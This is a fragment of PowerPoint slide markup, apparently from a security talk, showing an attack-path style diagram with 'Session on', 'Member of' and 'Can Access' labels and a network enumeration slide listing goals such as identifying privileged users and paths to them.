        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8458933" y="3526812"/>
            <a:ext cx="135432" cy="1259398"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent1">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553C072D-CF00-493A-A8E2-E3F798363998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4023634" y="4918229"/>
            <a:ext cx="1596744" cy="711359"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent1">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43C98AFE-8F5D-4B6E-B73E-D8CABFD268D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="3"/>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3649991" y="3931848"/>
            <a:ext cx="265681" cy="1324096"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent1">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2BD366A5-6CE4-488D-9039-23BFA8C59463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6707497" y="3526812"/>
            <a:ext cx="1377792" cy="1021257"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="228600">
              <a:schemeClr val="accent1">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38BB425F-8A90-49AC-A4FE-698505C6148C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="3971845"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="TextBox 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68E4F993-C545-4388-BAA6-B9F3FC3F05A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="183374" y="2213330"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="TextBox 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E7A9FA-F3CF-4BE7-A3C2-3D5112F47027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1962614" y="1576250"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="TextBox 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF289988-DBBF-426B-B022-44C77A294621}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475896" y="2679849"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="TextBox 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31046626-8119-4EDD-9968-699815511B90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775519" y="1760916"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="TextBox 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E7AF95-D51B-481B-B676-88C74B7A177F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775519" y="4333751"/>
            <a:ext cx="1416867" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="TextBox 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D81F4BFB-6AA8-43D3-A191-097A6F8A6D69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413703" y="5301606"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="TextBox 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC7D4DD1-C36B-4D30-BC95-6DA41FF81AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6189993" y="3576335"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Member of</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="TextBox 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5037F64D-DB5D-441B-9B7E-38E7BBB331E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458932" y="3870692"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="71" name="Straight Arrow Connector 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08E9769F-990A-494F-A77B-6612E4C1FAAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="42" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6604864" y="5084389"/>
            <a:ext cx="1419712" cy="986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DD87F1C6-E23C-40CE-AB91-E468FE21A52C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6511395" y="5116940"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="TextBox 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4FD1A6D-499B-487B-94BB-944448D3A82B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8893289" y="5396877"/>
            <a:ext cx="1416867" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D7ED58F-C0CF-4112-BB26-650A82495877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252745887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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Network Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E16930-73B6-44FE-B21B-B753AAF54EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857208" y="1661332"/>
            <a:ext cx="8555242" cy="5101932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" marR="0" indent="-457200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr sz="2600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>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buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identify the privileged users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identify current user(s) access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identify paths to privileged users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61128431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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Network Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E16930-73B6-44FE-B21B-B753AAF54EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857208" y="1661332"/>
            <a:ext cx="8555242" cy="5101932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" marR="0" indent="-457200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr sz="2600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
